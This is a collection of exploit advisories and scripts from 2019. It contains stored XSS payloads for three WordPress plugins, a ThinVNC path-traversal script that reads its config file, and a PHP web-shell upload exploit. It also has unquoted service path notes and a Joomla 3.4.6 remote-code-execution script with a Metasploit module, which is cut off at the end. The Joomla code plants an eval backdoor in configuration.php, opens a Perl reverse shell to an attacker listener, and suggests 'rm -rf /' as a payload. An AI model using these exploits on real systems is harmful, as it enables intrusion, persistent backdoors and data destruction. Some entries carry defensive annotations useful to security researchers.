  17. # Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\foogallery" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://foo.gallery/ # Software Link: https://wordpress.org/plugins/foogallery/ # Version: 1.8.12 # Tested on: Kali Linux # CVE: N/A # Description # This is a stored (persistent) XSS caused by missing input validation; it is located in the plugin settings panel. The settings page contains a select tag whose options take their values from the gallery titles, so breaking out of the option tag and writing a script tag in the title is enough. The vulnerable parameters are as follows. 1.Go to the 'add Gallery' of FooGallery 2.Enter the payload in the "add Title" 3.Click the "Publish" option 4.Go to plugin setting of FooGallery 5.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true # Parameter & Payload: post_title="/><script>alert("Unk9vvn")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true Content-Type: application/x-www-form-urlencoded Content-Length: 2694 Cookie: ...... 
Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effec
t%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=
  18. # Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\soliloquy-lite" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://soliloquywp.com/ # Software Link: https://wordpress.org/plugins/soliloquy-lite/ # Version: 2.5.6 # Tested on: Kali Linux # CVE: N/A # Description # This is a stored (persistent) XSS caused by missing input validation; it is located in the Preview of a new post inside Soliloquy. It happens when a user inserts a script tag in the title input and then saves the post; nothing is triggered until the target clicks Preview on the affected post. 1.Go to the 'Add new' section of soliloquy 2.Enter the payload in the "add Title" 3.Select a sample image 4.Click the "Publish" option 5.Click on Preview 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit # Parameter & Payload: post_title=&#47;"><script>alert("Unk9vvN")<&#47;script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1599 Cookie: ....... 
Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update
  19. # Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\popupbuilder" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://popup-builder.com/ # Software Link: https://wordpress.org/plugins/popup-builder/ # Version: 3.49 # Tested on: Kali Linux # CVE: N/A # Description # This is a stored (persistent) XSS caused by missing input validation; it is located in the "Add Post" and "Add Page" screens of WordPress. After Popup Builder is installed, it adds a section to Add Post and Add Page where you choose which popup to show; that section builds option tags whose values are the popup titles, so breaking out of the option tag and inserting a script tag in the popup title is enough. 1.Go to the 'Add new' section of Popup Builder 2.Select Image type 3.Enter the payload in the "add Title" 4.Click the "Publish" option 5.Go to Add New of Page section or Add New of Post section 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true # Parameter & Payload: post_title="/><script>alert("Unk9vvN")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 2425 Cookie: ...... 
Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&s
gpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
  20. # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read
#!/usr/bin/python3
# Review note (defensive context): the underlying weakness is a path traversal in the
# ThinVNC HTTP service -- the request path below contains "../" -- which lets a client
# that presents no credentials read ThinVnc.ini; the script prints two lines of that
# file. Detection: "../" sequences in requests to the ThinVNC web port. Mitigation: do
# not expose the ThinVNC web interface to untrusted networks; the header lists no fixed
# version for CVE-2019-17662.
import sys
import os  # NOTE(review): imported but never used.
import requests

def exploit(host,port):
    """Fetch ThinVnc.ini through the traversal URL and print its third and fourth lines.

    host and port are the strings taken from argv. Connection failures surface as
    requests exceptions; a response with fewer than four lines raises IndexError.
    """
    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])

def main():
    """Read <host> <port> from argv and call exploit(); print usage otherwise."""
    if(len(sys.argv)!=3):
        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
        # NOTE(review): missing .format(sys.argv[0]), so this prints a literal "{}".
        print("Example:\n{} 192.168.0.10 5888")
    else:
        port = sys.argv[2]
        host = sys.argv[1]
        exploit(host,port)

if __name__ == '__main__':
    main()
  # Exploit Title: Restaurant Management System 1.0 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Ibad Shah
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: N/A
# Tested on: Apache 2.4.41
#
# Defender notes (added in review):
# - The POST below sends a multipart part named "photo" whose filename ends in
#   .php (declared as Content-Type text/html) to admin/foods-exec.php, and the
#   script then expects the file at images/reverse-shell.php. That implies the
#   upload handler keeps the client-chosen filename and stores it under the
#   web root, where the server executes PHP.
# - Detection: uploads to admin/foods-exec.php whose part filename ends in
#   .php, and GET requests for images/*.php carrying a "cmd" query parameter.
# - Mitigation: allow-list file extensions and content types server-side,
#   rename stored uploads, and disable script execution in the images/
#   directory.
# - NOTE(review): a fixed PHPSESSID cookie is sent; whether foods-exec.php
#   requires a logged-in admin session is not shown here — confirm before
#   treating this as unauthenticated.
# - The post was flattened onto one line in this copy: the line breaks of the
#   banner and of the multipart body are lost and are reproduced here exactly
#   as they appear; no token was changed.
#!/usr/bin/python
import requests
import sys

# Banner (whitespace flattened in this copy of the post).
print (""" _ _ _____ __ __ _____ ______ _ _ _ _| || |_| __ \| \/ |/ ____| | ____| | | (_) | |_ __ _| |__) | \ / | (___ | |__ __ ___ __ | | ___ _| |_ _| || |_| _ /| |\/| |\___ \ | __| \ \/ / '_ \| |/ _ \| | __| |_ __ _| | \ \| | | |____) | | |____ > <| |_) | | (_) | | |_ |_||_| |_| \_\_| |_|_____/ |______/_/\_\ .__/|_|\___/|_|\__| | | |_| """)
print ("Credits : All InfoSec (Raja Ji's) Group")

# Base URL of the target; argv[1] is read before the length check below.
url = sys.argv[1]
if len(sys.argv[1]) < 8:
    print("[+] Usage : python rms-rce.py http://localhost:80/")
    exit()
print ("[+] Restaurant Management System Exploit, Uploading Shell")

# Upload endpoint of the admin area.
target = url+"admin/foods-exec.php"
# Browser-like headers; the Content-Type boundary must match the one used in
# the body below.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Length": "327",
    "Content-Type": "multipart/form-data; boundary=---------------------------191691572411478",
    "Connection": "close",
    "Referer": "http://localhost:8081/rms/admin/foods.php",
    "Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
    "Upgrade-Insecure-Requests": "1"
}
# Multipart body (line breaks flattened in this copy of the post).
data = """ -----------------------------191691572411478 Content-Disposition: form-data; name="photo"; filename="reverse-shell.php" Content-Type: text/html <?php echo shell_exec($_GET["cmd"]); ?> -----------------------------191691572411478 Content-Disposition: form-data; name="Submit" Add -----------------------------191691572411478-- """
# As written, the request is routed through a local proxy on 127.0.0.1:8080.
r = requests.post(target,verify=False, headers=headers,data=data, proxies={"http":"http://127.0.0.1:8080"})
print("[+] Shell Uploaded. Please check the URL : "+url+"images/reverse-shell.php")
  22. # Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Service Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor : Blackmoonftpserver # Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server # Version: BlackMoon FTP Server 3.1.2.1731 # CVE : N/A # Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit) 1. Description: The 'BMFTP-RELEASE' service in BlackMoon FTP Server 3.1.2.1731 has an unquoted service path. 2. PoC: C:\>sc qc BMFTP-RELEASE sc qc BMFTP-RELEASE [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BMFTP-RELEASE TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BlackMoon FTP Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt requires that a local user be able to place their own executable in the system root path without being detected by the OS or other security software, so that it is run when the service starts or the system reboots. If successful, the local user's code executes with the elevated privileges of the service (LocalSystem here). Under default Windows ACLs, standard users cannot create files directly in C:\ or write under C:\Program Files (x86)\, so this is only exploitable where those permissions have been loosened. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  23. # Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Softalk # Version : 7.5.1 # Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 # Tested on Windows 10 # CVE : N/A c:\>sc qc WorkgroupMail [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WorkgroupMail TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WorkgroupMail DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  24. # Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor Homepage : https://webcompanion.com # Source: https://webcompanion.com # Version: Web Companion versions 5.1.1035.1047 # CVE : N/A # Tested on: Windows 7 SP1(64bit) 1. Description: The 'WCAssistantService' service in Web Companion 5.1.1035.1047 has an unquoted service path. 2. PoC: C:\>sc qc WCAssistantService sc qc WCAssistantService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WC Assistant DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt requires that a local user be able to place their own executable in the system root path without being detected by the OS or other security software, so that it is run when the service starts or the system reboots. If successful, the local user's code executes with the elevated privileges of the service (LocalSystem here). Under default Windows ACLs, standard users cannot create files directly in C:\ or write under C:\Program Files (x86)\, so this is only exploitable where those permissions have been loosened. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  25. # Exploit Title: Joomla! 3.4.6 - Remote Code Execution # Google Dork: N/A # Date: 2019-10-02 # Exploit Author: Alessandro Groppo # Vendor Homepage: https//www.joomla.it/ # Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 # Version: 3.0.0 --> 3.4.6 # Tested on: Linux # CVE : N/A # Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41 # Github: https://github.com/kiks7/rusty_joomla_rce # # The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive. # If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /') #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup import sys import string import random import argparse from termcolor import colored PROXS = {'http':'127.0.0.1:8080'} PROXS = {} def random_string(stringLength): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) backdoor_param = random_string(50) def print_info(str): print(colored("[*] " + str,"cyan")) def print_ok(str): print(colored("[+] "+ str,"green")) def print_error(str): print(colored("[-] "+ str,"red")) def print_warning(str): print(colored("[!!] 
" + str,"yellow")) def get_token(url, cook): token = '' resp = requests.get(url, cookies=cook, proxies = PROXS) html = BeautifulSoup(resp.text,'html.parser') # csrf token is the last input for v in html.find_all('input'): csrf = v csrf = csrf.get('name') return csrf def get_error(url, cook): resp = requests.get(url, cookies = cook, proxies = PROXS) if 'Failed to decode session object' in resp.text: #print(resp.text) return False #print(resp.text) return True def get_cook(url): resp = requests.get(url, proxies=PROXS) #print(resp.cookies) return resp.cookies def gen_pay(function, command): # Generate the payload for call_user_func('FUNCTION','COMMAND') template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' #payload = command + ' || $a=\'http://wtf\';' payload = 'http://l4m3rz.l337/;' + command # Following payload will append an eval() at the enabled of the configuration file #payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def make_req(url , object_payload): # just make a req with object print_info('Getting Session Cookie ..') cook = get_cook(url) print_info('Getting CSRF Token ..') csrf = get_token( url, cook) user_payload = '\\0\\0\\0' * 9 padding = 'AAA' # It will land at this padding working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}' clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # 
working good without bad effects inj_object = '";' inj_object += object_payload inj_object += 's:6:"return";s:102:' # end the object with the 'return' part password_payload = padding + inj_object params = { 'username': user_payload, 'password': password_payload, 'option':'com_users', 'task':'user.login', csrf :'1' } print_info('Sending request ..') resp = requests.post(url, proxies = PROXS, cookies = cook,data=params) return resp.text def get_backdoor_pay(): # This payload will backdoor the the configuration .PHP with an eval on POST request function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # payload = command + ' || $a=\'http://wtf\';' # Following payload will append an eval() at the enabled of the configuration file payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def check(url): check_string = random_string(20) target_url = url + 'index.php/component/users' html = make_req(url, gen_pay('print_r',check_string)) if check_string in html: return True else: return False def ping_backdoor(url,param_name): res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS) if 'PWNED' in res.text: return True return False def execute_backdoor(url, payload_code): # Execute PHP code from the backdoor res = requests.post(url + '/configuration.php', 
data={backdoor_param:payload_code}, proxies = PROXS) print(res.text) def exploit(url, lhost, lport): # Exploit the target # Default exploitation will append en eval function at the end of the configuration.pphp # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters') # e.g. get_payload('system','rm -rf /') # First check that the backdoor has not been already implanted target_url = url + 'index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param) print_info('Now it\'s time to reverse, trying with a system + perl') execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target',required=True,help='Joomla Target') parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only') parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit') parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP') parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port') args = vars(parser.parse_args()) url = args['target'] if(check(url)): print_ok('Vulnerable') if args['exploit']: exploit(url, args['lhost'], args['lport']) else: print_info('Use --exploit to exploit it') else: print_error('Seems NOT Vulnerable ;/') metasploit_rusty_joomla_rce.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = 
ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla def initialize(info = {}) super(update_info(info, 'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution', 'Description' => %q{ PHP Object Injection because of a downsize in the read/write process with the database leads to RCE. The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter. That's because the exploit is more reliabale (doesn't rely on common disabled function). For this reason, use it with caution and remember the house cleaning. Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy }, 'Author' => [ 'Alessandro \'kiks\' Groppo @Hacktive Security', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'] ], 'Privileged' => false, 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]], 'DisclosureDate' => 'Oct 02 2019', 'DefaultTarget' => 0) ) register_advanced_options( [ OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), ]) end def get_random_string(length=50) source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a key="" length.times{ key += source[rand(source.size)].to_s } return key end def get_session_token # Get session token from cookies vprint_status('Getting Session Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) cook = res.headers['Set-Cookie'].split(';')[0] vprint_status('Session cookie: ' + cook) return cook end def get_csrf_token(sess_cookie) vprint_status('Getting CSRF Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'headers' => { 'Cookie' => sess_cookie, } }) html = res.get_html_document input_field = 
html.at('//form').xpath('//input')[-1] token = input_field.to_s.split(' ')[2] token = token.gsub('name="','').gsub('"','') if token then vprint_status('CSRF Token: ' + token) return token end print_error('Cannot get the CSRF Token ..') end def get_payload(function, payload) # @function: The PHP Function # @payload: The payload for the call template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values payload = 'http://l4m3rz.l337/;' + payload final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', 